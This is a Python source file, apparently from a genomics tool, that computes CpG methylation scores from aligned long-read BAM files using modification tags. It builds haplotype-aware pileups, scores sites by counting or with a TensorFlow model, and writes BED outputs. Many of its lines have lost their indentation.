for arg, val in vars(args).items():
logging.info("\t--{}: {}".format(arg, val))
def get_regions_to_process(input_bam, input_fasta, chunksize, modsites, pileup_mode, model_dir, min_mapq, hap_tag):
"""
Breaks reference regions into smaller regions based on chunk
size specified. Returns a list of lists that can be used for
multiprocessing. Each sublist contains:
[bam path (str), fasta path (str), modsites (str),
reference name (str), start coordinate (int), stop coordinate (int)]
:param input_bam: Path to input bam file. (str)
:param input_fasta: Path to reference fasta file. (str)
:param chunksize: Chunk size (default = 500000). (int)
:param modsites: Filtering method. (str: "denovo", "reference")
:param pileup_mode: Site modification calling method. (str: "model", "count")
:param model_dir: Full path to model directory to load (if supplied), otherwise is None.
:param min_mapq: Minimum mapping quality score. (int)
:param hap_tag: The SAM tag label containing haplotype information. (str)
:return regions_to_process: List of lists containing region sizes. (list)
"""
logging.info("get_regions_to_process: Starting chunking.")
# open the input bam file with pysam
bamIn = pysam.AlignmentFile(input_bam, 'rb')
# empty list to store sublists with region information
regions_to_process = []
# iterate over reference names and their corresponding lengths
references = zip(bamIn.references, bamIn.lengths)
for ref, length in references:
start = 1
while start < length:
end = start + chunksize
if end < length:
regions_to_process.append([input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, start, end - 1, min_mapq, hap_tag])
else:
regions_to_process.append([input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, start, length, min_mapq, hap_tag])
start = start + chunksize
# close bam
bamIn.close()
logging.info("get_regions_to_process: Created {:,} region chunks.\n".format(len(regions_to_process)))
return regions_to_process
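# Example (illustrative): with chunksize=500000, a 1,200,000 bp contig yields
# three chunks covering coordinates 1-500000, 500001-1000000, and 1000001-1200000,
# each packaged with the shared bam/fasta/option fields in its sublist.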
def cg_sites_from_fasta(input_fasta, ref):
"""
Gets all CG site positions from a given reference region, and
make positions keys in a dict with empty strings as vals.
:param input_fasta: A path to reference fasta file. (str)
:param ref: Reference name. (str)
:return cg_sites_ref_set: Set with all CG ref positions. (set)
"""
    cg_sites_ref_set = None
    # open fasta with BioPython and iterate over records
    with open(input_fasta) as fh:
for record in SeqIO.parse(fh, "fasta"):
# if record name matches this particular ref,
if record.id == ref:
# use regex to find all indices for 'CG' in the reference seq, e.g. the C positions
cg_sites_ref_set = {i.start() for i in re.finditer('CG', str(record.seq.upper()))}
# there may be some stretches without any CpGs in a reference region
# handle these edge cases by adding a dummy value of -1 (an impossible coordinate)
if not cg_sites_ref_set:
cg_sites_ref_set.add(-1)
# once seq is found, stop iterating
break
# make sure the ref region was matched to a ref fasta seq
    if cg_sites_ref_set is None:
logging.error("cg_sites_from_fasta: The sequence '{}' was not found in the reference fasta file.".format(ref))
raise ValueError('The sequence "{}" was not found in the reference fasta file!'.format(ref))
return cg_sites_ref_set
def get_mod_sequence(integers):
"""
A generator that takes an iterable of integers coding mod bases from the SAM Mm tags, and yields an iterable of
positions of sequential bases.
Example: [5, 12, 0] -> [6, 19, 20]
In above example the 6th C, 19th C, and 20th C are modified
See this example described in: https://samtools.github.io/hts-specs/SAMtags.pdf; Dec 9 2021
:param integers: Iterable of integers (parsed from SAM Mm tag). (iter)
:return mod_sequence: Iterator of integers, 1-based counts of position of modified base in set of bases. (iter)
"""
base_count = 0
for i in integers:
base_count += i + 1
yield base_count
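# Example (illustrative): the delta-encoded Mm integers [5, 12, 0] decode to the
# running base counts [6, 19, 20], i.e. the 6th, 19th, and 20th C are modified:
#   >>> list(get_mod_sequence([5, 12, 0]))
#   [6, 19, 20]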
def get_base_indices(query_seq, base, reverse):
"""
Find all occurrences of base in query sequence and make a list of their
indices. Return the list of indices.
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return: List of integers, 0-based indices of all bases in query seq. (list)
"""
if reverse == False:
return [i.start() for i in re.finditer(base, query_seq)]
# if seq stored in reverse, need reverse complement to get correct indices for base
# use biopython for this (convert to Seq, get RC, convert to string)
else:
return [i.start() for i in re.finditer(base, str(Seq(query_seq).reverse_complement()))]
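# Example (illustrative): C positions in the stored sequence vs. in its
# reverse complement ('ACGTC' reverse-complements to 'GACGT'):
#   >>> get_base_indices('ACGTC', 'C', reverse=False)
#   [1, 4]
#   >>> get_base_indices('ACGTC', 'C', reverse=True)
#   [2]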
def parse_mmtag(query_seq, mmtag, modcode, base, reverse):
"""
Get a generator of the 0-based indices of the modified bases in the query sequence.
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
:param modcode: The modification code to search for in the tag ('C+m'). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return mod_base_indices: Generator of integers, 0-based indices of all mod bases in query seq. (iter)
"""
try:
# tags are written as: C+m,5,12,0;C+h,5,12,0;
# if multiple mod types present in tag, must find relevant one first
modline = next(x[len(modcode)+1:] for x in mmtag.split(';') if x.startswith(modcode))
# first get the sequence of the mod bases from tag integers
# this is a 1-based position of each mod base in the complete set of this base from this read
# e.g., [6, 19, 20] = the 6th, 19th, and 20th C bases are modified in the set of Cs
mod_sequence = get_mod_sequence((int(x) for x in modline.split(',')))
# get all 0-based indices of this base in this read, e.g. every C position
base_indices = get_base_indices(query_seq, base, reverse)
# use the mod sequence to identify indices of the mod bases in the read
return (base_indices[i - 1] for i in mod_sequence)
    except (StopIteration, IndexError, ValueError):
        # no entry for this mod code, or a tag that cannot be decoded
        return iter(())
def parse_mltag(mltag):
"""
Convert 255 discrete integer code into mod score 0-1, return as a generator.
This is NOT designed to handle interleaved Ml format for multiple mod types!
:param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
:return: Generator of floats, probabilities of all mod bases in query seq. (iter)
"""
return (round(x / 256, 3) if x > 0 else 0 for x in mltag)
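# Example (illustrative): Ml byte codes scale linearly onto [0, 1):
#   >>> list(parse_mltag([204, 89, 0]))
#   [0.797, 0.348, 0]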
def get_mod_dict(query_seq, mmtag, modcode, base, mltag, reverse):
"""
Make a dictionary from the Mm and Ml tags, in which the
modified base index (in the query seq) is the key and the
mod score is the value.
This is NOT designed to handle interleaved Ml format for multiple mod types!
:param query_seq: The original read sequence (not aligned read sequence). (str)
:param mmtag: The Mm tag obtained for the read ('C+m,5,12,0;'). (str)
:param modcode: The modification code to search for in the tag ('C+m'). (str)
:param base: The nucleotide modifications occur on ('C'). (str)
:param mltag: The Ml tag obtained for the read with('Ml:B:C,204,89,26'). (str)
:param reverse: True/False whether sequence is reversed. (Boolean)
:return mod_dict: Dictionary with mod positions and scores. (dict)
"""
mod_base_indices = parse_mmtag(query_seq, mmtag, modcode, base, reverse)
mod_scores = parse_mltag(mltag)
mod_dict = dict(zip(mod_base_indices, mod_scores))
return mod_dict
def pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites):
"""
For a given region, retrieve all reads.
For each read, iterate over positions aligned to this region.
Build a list with an entry for each ref position in the region. Each entry has a list of 3-tuples, each of which
includes information from a read base read aligned to that site. The 3-tuple contains strand information,
modification score, and haplotype.
(strand symbol (str), mod score (float), haplotype (int))
Return the unfiltered list of base modification data.
:param bamIn: AlignmentFile object of input bam file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param min_mapq: Minimum mapping quality score. (int)
:param hap_tag: Name of SAM tag containing haplotype information. (str)
:param modsites: Filtering method. (str: "denovo", "reference")
:return basemod_data: Unfiltered list of base modification data (list)
:return cg_sites_read_set: Set of positions in read consensus sequence with CG, given as reference position. The
set is empty unless modsites is 'denovo' (set)
"""
logging.debug("coordinates {}: {:,}-{:,}: (2) pileup_from_reads".format(ref, pos_start, pos_stop))
basemod_data = []
# These structures are only used for modsites denovo mode
pos_pileup = []
pos_pileup_hap1 = []
pos_pileup_hap2 = []
is_denovo_modsites = modsites == "denovo"
# iterate over all reads present in this region
for read in bamIn.fetch(contig=ref, start=pos_start, stop=pos_stop):
# check if passes minimum mapping quality score
if read.mapping_quality < min_mapq:
#logging.warning("pileup_from_reads: read did not pass minimum mapQV: {}".format(read.query_name))
continue
# identify the haplotype tag, if any (default tag = HP)
# values are 1 or 2 (for haplotypes), or 0 (no haplotype)
# an integer is expected but custom tags can produce strings instead
        try:
            hap_val = read.get_tag(hap_tag)
            try:
                hap = int(hap_val)
            except ValueError:
                logging.error("coordinates {}: {:,}-{:,}: (2) pileup_from_reads: illegal haplotype value {}".format(ref, pos_start, pos_stop, hap_val))
                # fall back to the unphased haplotype so 'hap' is always defined
                hap = 0
        except KeyError:
            hap = 0
# check for SAM-spec methylation tags
# draft tags were Ml and Mm, accepted tags are now ML and MM
# check for both types, set defaults to None and change if found
mmtag, mltag = None, None
try:
mmtag = read.get_tag('Mm')
mltag = read.get_tag('Ml')
except KeyError:
pass
try:
mmtag = read.get_tag('MM')
mltag = read.get_tag('ML')
except KeyError:
pass
if mmtag is not None and mltag is not None:
if not basemod_data:
ref_pos_count = 1 + pos_stop - pos_start
basemod_data = [[] for _ in range(ref_pos_count)]
if is_denovo_modsites:
pos_pileup = [[] for _ in range(ref_pos_count)]
pos_pileup_hap1 = [[] for _ in range(ref_pos_count)]
pos_pileup_hap2 = [[] for _ in range(ref_pos_count)]
            is_reverse = bool(read.is_reverse)
            strand = "-" if is_reverse else "+"
            if is_reverse:
                # offset used to map an aligned query index back into original read coordinates
                rev_strand_offset = len(read.query_sequence) - 2
# note that this could potentially be used for other mod types, but
# the Mm and Ml parsing functions are not set up for the interleaved format
# e.g., ‘Mm:Z:C+mh,5,12; Ml:B:C,204,26,89,130’ does NOT work
# to work it must be one mod type, and one score per mod position
mod_dict = get_mod_dict(read.query_sequence, mmtag, 'C+m', 'C', mltag, is_reverse)
            # iterate over aligned positions, trimming 20 aligned pairs from each read end
            for query_pos, ref_pos in read.get_aligned_pairs(matches_only=True)[20:-20]:
                # make sure ref position is in range of ref target region
                if pos_start <= ref_pos <= pos_stop:
                    ref_offset = ref_pos - pos_start
                    # building a consensus is MUCH faster when we iterate over reads (vs. by column then by read)
                    # here each read base is appended to per-position lists indexed by reference offset
                    if is_denovo_modsites:
                        query_base = read.query_sequence[query_pos]
                        pos_pileup[ref_offset].append(query_base)
                        if hap == 1:
                            pos_pileup_hap1[ref_offset].append(query_base)
                        elif hap == 2:
                            pos_pileup_hap2[ref_offset].append(query_base)
                    # identify if read is reverse strand or forward to set correct location
                    if is_reverse:
                        location = rev_strand_offset - query_pos
                    else:
                        location = query_pos
                    # check if this position has a mod score in the dictionary,
                    # if not assign score of zero
                    score = mod_dict.get(location, 0)
                    # Add tuple with strand, modification score, and haplotype to the list for this position
                    basemod_data[ref_offset].append((strand, score, hap))
# if no SAM-spec methylation tags present, ignore read and log
else:
logging.warning("pileup_from_reads: read missing MM and/or ML tag(s): {}".format(read.query_name))
cg_sites_read_set = set()
if is_denovo_modsites:
for refpos_list in (pos_pileup, pos_pileup_hap1, pos_pileup_hap2):
last_base = 'N'
last_index = 0
for index,v in enumerate(refpos_list):
# find the most common base, if no reads present use N
if len(v):
base = Counter(v).most_common(1)[0][0]
else:
base = 'N'
if last_base == 'C' and base == 'G' :
cg_sites_read_set.add(pos_start+last_index)
# This restriction recreates the original code behavior:
# - Advantage: Method can find a CpG aligning across a deletion in the reference
# - Disadvantage: Method will find 'fake' CpG across gaps in the haplotype phasing
#
# The disadvantage is fixable, but first focus on identical output to make verification easy
if base != 'N':
last_base = base
last_index = index
return basemod_data, cg_sites_read_set
def filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites):
"""
Filter the per-position base modification data, based on the modsites option selected:
"reference": Keep all sites that match a reference CG site (this includes both
modified and unmodified sites). It will exclude all modified sites
that are not CG sites, according to the ref sequence.
"denovo": Keep all sites which have at least one modification score > 0, per strand.
This can include sites that are CG in the reads, but not in the reference.
It can exclude CG sites with no modifications on either strand from being
written to the bed file.
Return the filtered list.
:param basemod_data: List of base modification data per position, offset by pos_start. (list)
:param cg_sites_read_set: Set with reference coordinates for all CG sites in consensus from reads. (set)
    :param input_fasta: A path to reference fasta file. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param modsites: Filtering method. (str: "denovo", "reference")
:param ref: Reference name. (str)
:return filtered_basemod_data: List of 2-tuples for each position retained after filtering. Each 2-tuple is the
reference position and base mod data list. The list is sorted by reference position (list)
"""
filtered_basemod_data = []
if modsites == "reference":
if basemod_data:
# Get CG positions in reference
cg_sites_ref_set = cg_sites_from_fasta(input_fasta, ref)
# Keep all sites that match a reference CG position and have at least one basemod observation.
filtered_basemod_data=[(i+pos_start,v) for i, v in enumerate(basemod_data) if (i + pos_start) in cg_sites_ref_set and v]
logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
elif modsites == "denovo":
if basemod_data:
# Keep all sites that match position of a read consensus CG site.
filtered_basemod_data=[(i+pos_start,v) for i, v in enumerate(basemod_data) if (i + pos_start) in cg_sites_read_set]
logging.debug("coordinates {}: {:,}-{:,}: (3) filter_basemod_data: sites kept = {:,}".format(ref, pos_start, pos_stop, len(filtered_basemod_data)))
del basemod_data
del cg_sites_read_set
return filtered_basemod_data
def calc_stats(df):
"""
    Gets summary stats from a given dataframe.
    :param df: Pandas dataframe with a 'prob' column.
    :return: Percent modified, modified count, unmodified count, mean modified score, mean unmodified score.
"""
total = df.shape[0]
mod = df[df['prob'] > 0.5].shape[0]
unMod = df[df['prob'] <= 0.5].shape[0]
modScore = "." if mod == 0 else str(round(df[df['prob'] > 0.5]['prob'].mean(), 3))
unModScore = "." if unMod == 0 else str(round(df[df['prob'] <= 0.5]['prob'].mean(), 3))
percentMod = 0.0 if mod == 0 else round((mod / total) * 100, 1)
return percentMod, mod, unMod, modScore, unModScore
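# Example (illustrative): 3 of 4 reads exceed the 0.5 modification cutoff:
#   >>> calc_stats(pd.DataFrame({'prob': [0.9, 0.8, 0.6, 0.1]}))
#   (75.0, 3, 1, '0.767', '0.1')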
def collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data):
"""
Iterates over reference positions and for each position, makes a pandas dataframe from the sublists.
The dataframe is filtered for strands and haplotypes, and summary statistics are
calculated with calc_stats().
    For each position and strand/haplotype combination, a sublist of summary information
is appended to the bed_results list:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
This information is used to write the output bed file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param filtered_basemod_data: List of 2-tuples for each position remaining after filtration. Each 2-tuple is the
reference position and base mod dat. The list is sorted by reference position (list)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_count".format(ref, pos_start, pos_stop))
# intiate empty list to store bed sublists
bed_results = []
# iterate over the ref positions and corresponding vals
for (refPosition, modinfoList) in filtered_basemod_data:
# create pandas dataframe from this list of sublists
df = pd.DataFrame(modinfoList, columns=['strand', 'prob', 'hap'])
# Filter dataframe based on strand/haplotype combinations, get information,
# and create sublists and append to bed_results.
# merged strands / haplotype 1
percentMod, mod, unMod, modScore, unModScore = calc_stats(df[df['hap'] == 1])
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"hap1", mod + unMod, mod, unMod, modScore, unModScore])
# merged strands / haplotype 2
percentMod, mod, unMod, modScore, unModScore = calc_stats(df[df['hap'] == 2])
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"hap2", mod + unMod, mod, unMod, modScore, unModScore])
# merged strands / both haplotypes
percentMod, mod, unMod, modScore, unModScore = calc_stats(df)
if mod + unMod >= 1:
bed_results.append([ref, refPosition, (refPosition + 1), percentMod,
"Total", mod + unMod, mod, unMod, modScore, unModScore])
return bed_results
def get_normalized_histo(probs, adj):
"""
Create the array data structure needed to apply the model, for a given site.
:param probs: List of methylation probabilities. (list)
:param adj: A 0 or 1 indicating whether previous position was a CG. (int)
:return: List with normalized histogram and coverage (if min coverage met), else returns empty list. (list)
"""
    cov = len(probs)
    # the model needs at least 4 reads at a site; this floor is hardcoded here,
    # independent of the --min_coverage filter applied to the output bed files
    if cov >= 4:
hist = np.histogram(probs, bins=20, range=[0, 1])[0]
norm = np.linalg.norm(hist)
# divide hist by norm and add values to array
# add either 0 (not adjacent to a prior CG) or 1 (adjacent to a prior CG) to final spot in array
norm_hist = np.append(hist / norm, adj)
return [norm_hist, cov]
else:
return []
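# Example (illustrative): five probabilities give a 20-bin L2-normalized
# histogram with the adjacency flag appended as a 21st feature:
#   >>> norm_hist, cov = get_normalized_histo([0.1, 0.9, 0.95, 0.2, 0.05], 1)
#   >>> len(norm_hist), cov
#   (21, 5)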
def discretize_score(score, coverage):
"""
Apply a small correction to the model probability to make it
compatible with the number of reads at that site. Allows the number
of modified and unmodified reads to be estimated.
:param score: Modification probability, from model. (float)
:param coverage: Number of reads. (int)
:return mod_reads: Estimated number of modified reads. (int)
:return unmod_reads: Estimated number of unmodified reads. (int)
:return adjusted_score: Adjusted probability score, based on percent modified reads. (float)
"""
# need to round up or round down modified read numbers based on score
# which allows a push towards 0/50/100 for adjusted score
if score > 50:
if score < 65:
mod_reads = int(np.floor(score/100 * float(coverage)))
else:
mod_reads = int(np.ceil(score/100 * float(coverage)))
else:
if score > 35:
mod_reads = int(np.ceil(score/100 * float(coverage)))
else:
mod_reads = int(np.floor(score/100 * float(coverage)))
unmod_reads = int(coverage) - mod_reads
if mod_reads == 0:
adjusted_score = 0.0
else:
adjusted_score = round((mod_reads / (mod_reads + unmod_reads)) * 100, 1)
return mod_reads, unmod_reads, adjusted_score
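# Example (illustrative): a model score of 62.0 over 10 reads falls in the
# 50-65 band, so the modified count is floored to 6 and the score re-derived:
#   >>> discretize_score(62.0, 10)
#   (6, 4, 60.0)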
def apply_model(refpositions, normhistos, coverages, ref, pos_start, pos_stop, model, hap, bed_results):
"""
Apply model to make modification calls for all sites using a sliding window approach.
Append to a list of results, ultimately for bed file:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param refpositions: List with all CG positions. (list)
:param normhistos: List with all normalized histogram data structures. (list)
:param coverages: List with all CG coverages. (list)
:param ref: Reference contig name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param model: The tensorflow model object.
:param hap: Label of haplotype (hap1, hap2, or Total). (str)
:param bed_results: List of bed results to which these model results will be appended (list)
"""
    # the model scores sliding windows of 11 sites, so regions without enough
    # qualifying sites to fill a window are skipped
    if len(normhistos) > 11:
featPad = np.pad(np.stack(normhistos), pad_width=((6, 4), (0, 0)), mode='constant', constant_values=0)
featuresWindow = sliding_window_view(featPad, 11, axis=0)
featuresWindow = np.swapaxes(featuresWindow, 1, 2)
predict = model.predict(featuresWindow)
predict = np.clip(predict, 0, 1)
for i, position in enumerate(refpositions):
model_score = round(predict[i][0] * 100, 1)
mod_reads, unmod_reads, adjusted_score = discretize_score(model_score, coverages[i])
bed_results.append((ref, position, (position + 1), model_score, hap, coverages[i], mod_reads, unmod_reads, adjusted_score))
else:
logging.warning("coordinates {}: {:,}-{:,}: apply_model: insufficient data for {}".format(ref, pos_start, pos_stop, hap))
def collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir):
"""
Iterates over reference positions and creates normalized histograms of scores,
feeds all sites and scores into model function to assign modification probabilities,
and creates a list of sublists for writing bed files:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
This information is returned and ultimately used to write the output bed file.
:param ref: Reference name. (str)
:param pos_start: Start coordinate for region. (int)
:param pos_stop: Stop coordinate for region. (int)
:param filtered_basemod_data: List of 2-tuples for each position remaining after filtration. Each 2-tuple is the
reference position and base mod dat. The list is sorted by reference position (list)
:param model_dir: Full path to directory containing model. (str)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.debug("coordinates {}: {:,}-{:,}: (4) collect_bed_results_model".format(ref, pos_start, pos_stop))
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
logging.getLogger('tensorflow').setLevel(logging.ERROR)
# this may or may not do anything to help with the greedy thread situation...
#tf.config.threading.set_intra_op_parallelism_threads(1)
#tf.config.threading.set_inter_op_parallelism_threads(1)
model = tf.keras.models.load_model(model_dir, compile=False)
total_refpositions, total_normhistos, total_coverages = [], [], []
hap1_refpositions, hap1_normhistos, hap1_coverages = [], [], []
hap2_refpositions, hap2_normhistos, hap2_coverages = [], [], []
# set initial C index for CG location to 0
previousLocation = 0
# iterate over reference positions and values (list containing [strand, score, hap]) in filtered_basemod_data
for (refPosition, modinfoList) in filtered_basemod_data:
# determine if there is an adjacent prior CG, score appropriately
if (refPosition - previousLocation) == 2:
adj = 1
else:
adj = 0
# update CG position
previousLocation = refPosition
# build lists for combined haplotypes
# returns [norm_hist, cov] if min coverage met, otherwise returns empty list
total_result_list = get_normalized_histo([x[1] for x in modinfoList], adj)
if total_result_list:
total_normhistos.append(total_result_list[0])
total_coverages.append(total_result_list[1])
total_refpositions.append(refPosition)
# build lists for hap1
hap1_result_list = get_normalized_histo([x[1] for x in modinfoList if x[2] == 1], adj)
if hap1_result_list:
hap1_normhistos.append(hap1_result_list[0])
hap1_coverages.append(hap1_result_list[1])
hap1_refpositions.append(refPosition)
# build lists for hap2
hap2_result_list = get_normalized_histo([x[1] for x in modinfoList if x[2] == 2], adj)
if hap2_result_list:
hap2_normhistos.append(hap2_result_list[0])
hap2_coverages.append(hap2_result_list[1])
hap2_refpositions.append(refPosition)
# initiate empty list to store all bed results
bed_results = []
# run model for total, hap1, hap2, and add to bed results if non-empty list was returned
apply_model(total_refpositions, total_normhistos, total_coverages, ref, pos_start, pos_stop, model, "Total", bed_results)
apply_model(hap1_refpositions, hap1_normhistos, hap1_coverages, ref, pos_start, pos_stop, model, "hap1", bed_results)
apply_model(hap2_refpositions, hap2_normhistos, hap2_coverages, ref, pos_start, pos_stop, model, "hap2", bed_results)
return bed_results
def run_process_region(arguments):
"""
Process a given reference region to identify modified bases.
Uses pickled args (input_file, ref, pos_start, pos_stop) to run
pileup_from_reads() to get all desired sites (based on modsites option),
then runs collect_bed_results() to summarize information.
The sublists will differ between model or count method, but they always share the first 7 elements:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]
:param arguments: Pickled list. (list)
:return bed_results: List of sublists with information to write the output bed file. (list)
"""
# unpack pickled items:
# [bam path (str), fasta path (str), modsites option (str),
# pileup_mode option (str), model directory path (str),
# reference contig name (str), start coordinate (int),
# stop coordinate (int), minimum mapping QV (int), haplotype tag name (str)]
input_bam, input_fasta, modsites, pileup_mode, model_dir, ref, pos_start, pos_stop, min_mapq, hap_tag = arguments
logging.debug("coordinates {}: {:,}-{:,}: (1) run_process_region: start".format(ref, pos_start, pos_stop))
# open the input bam file with pysam
bamIn = pysam.AlignmentFile(input_bam, 'rb')
# get all ref sites with mods and information from corresponding aligned reads
basemod_data, cg_sites_read_set = pileup_from_reads(bamIn, ref, pos_start, pos_stop, min_mapq, hap_tag, modsites)
# filter based on denovo or reference sites
filtered_basemod_data = filter_basemod_data(basemod_data, cg_sites_read_set, ref, pos_start, pos_stop, input_fasta, modsites)
# bam object no longer needed, close file
bamIn.close()
if filtered_basemod_data:
# summarize the mod results, depends on pileup_mode option selected
if pileup_mode == "count":
bed_results = collect_bed_results_count(ref, pos_start, pos_stop, filtered_basemod_data)
elif pileup_mode == "model":
bed_results = collect_bed_results_model(ref, pos_start, pos_stop, filtered_basemod_data, model_dir)
else:
bed_results = []
logging.debug("coordinates {}: {:,}-{:,}: (5) run_process_region: finish".format(ref, pos_start, pos_stop))
    # result lists that are empty or trivially small are returned as None and
    # filtered out by the caller
    if len(bed_results) > 1:
        return bed_results
    else:
        return None
def run_process_region_wrapper(arguments):
try:
return run_process_region(arguments)
except Exception as e:
sys.stderr.write("Exception thrown in worker process {}: {}\n".format(os.getpid(),e))
raise
def run_all_pileup_processing(regions_to_process, threads):
"""
Function to distribute jobs based on reference regions created.
Collects results and returns list for writing output bed file.
The bed results will differ based on model or count method, but they always share the first 7 elements:
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage, ...]
:param regions_to_process: List of sublists defining regions (input_file, ref, pos_start, pos_stop). (list)
:param threads: Number of threads to use for multiprocessing. (int)
:return filtered_bed_results: List of sublists with information to write the output bed file. (list)
"""
logging.info("run_all_pileup_processing: Starting parallel processing.\n")
# run all jobs
progress_bar = None
if sys.stderr.isatty():
progress_bar = tqdm(total=len(regions_to_process), miniters=1, smoothing=0)
bed_results = []
with concurrent.futures.ProcessPoolExecutor(max_workers=threads) as executor:
futures = [executor.submit(run_process_region_wrapper, r) for r in regions_to_process]
# Process results in order of completion
for future in concurrent.futures.as_completed(futures):
bed_result = future.result()
bed_results.append(bed_result)
if progress_bar:
progress_bar.update(1)
if progress_bar:
progress_bar.close()
logging.info("run_all_pileup_processing: Finished parallel processing.\n")
# results is a list of sublists, may contain None, remove these
filtered_bed_results = [i for i in bed_results if i]
# turn list of lists of sublists into list of sublists
flattened_bed_results = [i for sublist in filtered_bed_results for i in sublist]
# ensure bed results are sorted by ref contig name, start position
logging.info("run_all_pileup_processing: Starting sort for bed results.\n")
if flattened_bed_results:
flattened_bed_results.sort(key=itemgetter(0, 1))
logging.info("run_all_pileup_processing: Finished sort for bed results.\n")
return flattened_bed_results
def write_output_bed(label, modsites, min_coverage, bed_results):
"""
Writes output bed file(s) based on information in bed_merge_results (default).
Separates results into total, hap1, and hap2. If haplotypes not available,
only total is produced.
The bed_merge_results list will contain slighty different information depending on the pileup_mode option,
but the first 7 fields will be identical:
count-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
OR
model-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
    :param label: Prefix label used to name the output bed files. (str)
:param modsites: "reference" or "denovo", for the CpG detection mode. (str)
:param min_coverage: Minimum coverage to retain a site. (int)
:param bed_results: List of sublists with information to write the output bed file. (list)
:return output_files: List of output bed file names that were successfully written. (list)
"""
logging.info("write_output_bed: Writing unfiltered output bed files.\n")
out_total = "{}.combined.{}.bed".format(label, modsites)
out_hap1 = "{}.hap1.{}.bed".format(label, modsites)
out_hap2 = "{}.hap2.{}.bed".format(label, modsites)
cov_total = "{}.combined.{}.mincov{}.bed".format(label, modsites, min_coverage)
cov_hap1 = "{}.hap1.{}.mincov{}.bed".format(label, modsites, min_coverage)
cov_hap2 = "{}.hap2.{}.mincov{}.bed".format(label, modsites, min_coverage)
# remove any previous version of output files
for f in [out_total, out_hap1, out_hap2, cov_total, cov_hap1, cov_hap2]:
if os.path.exists(f):
os.remove(f)
with open(out_total, 'a') as fh_total:
with open(out_hap1, 'a') as fh_hap1:
with open(out_hap2, 'a') as fh_hap2:
for i in bed_results:
if i[4] == "Total":
fh_total.write("{}\n".format("\t".join([str(j) for j in i])))
elif i[4] == "hap1":
fh_hap1.write("{}\n".format("\t".join([str(j) for j in i])))
elif i[4] == "hap2":
fh_hap2.write("{}\n".format("\t".join([str(j) for j in i])))
# write coverage-filtered versions of bed files
logging.info("write_output_bed: Writing coverage-filtered output bed files, using min coverage = {}.\n".format(min_coverage))
output_files = []
for inBed, covBed in [(out_total, cov_total), (out_hap1, cov_hap1), (out_hap2, cov_hap2)]:
# if haplotypes not present, the bed files are empty, remove and do not write cov-filtered version
if os.stat(inBed).st_size == 0:
os.remove(inBed)
else:
output_files.append(inBed)
# write coverage filtered bed file
with open(inBed, 'r') as fh_in, open(covBed, 'a') as fh_out:
for line in fh_in:
if int(line.split('\t')[5]) >= min_coverage:
fh_out.write(line)
# check to ensure some sites were written, otherwise remove
if os.stat(covBed).st_size == 0:
os.remove(covBed)
else:
output_files.append(covBed)
return output_files
def make_bed_df(bed, pileup_mode):
"""
Construct a pandas dataframe from a bed file.
count-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) % mod sites, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) mod score, (9) unmod score]
OR
model-based list
[(0) ref name, (1) start coord, (2) stop coord, (3) mod probability, (4) haplotype, (5) coverage,
(6) mod sites, (7) unmod sites, (8) adjusted probability]
:param bed: Name of bed file.
:param pileup_mode: Site modification calling method. (str: "model", "count")
:return df: Pandas dataframe.
"""
logging.debug("make_bed_df: Converting '{}' to pandas dataframe.\n".format(bed))
if pileup_mode == "count":
df = pd.read_csv(bed, sep='\t', header=None,
names = ['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',
'modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score'])
df.drop(columns=['modified_bases', 'unmodified_bases', 'mod_score', 'unmod_score', 'haplotype', 'coverage'], inplace=True)
elif pileup_mode == "model":
df = pd.read_csv(bed, sep='\t', header=None,
names = ['chromosome', 'start', 'stop', 'mod_probability', 'haplotype', 'coverage',
'modified_bases', 'unmodified_bases', 'adj_prob'])
df.drop(columns=['haplotype', 'coverage', 'modified_bases', 'unmodified_bases', 'adj_prob'], inplace=True)
#df.sort_values(by=['chromosome', 'start'], inplace=True)
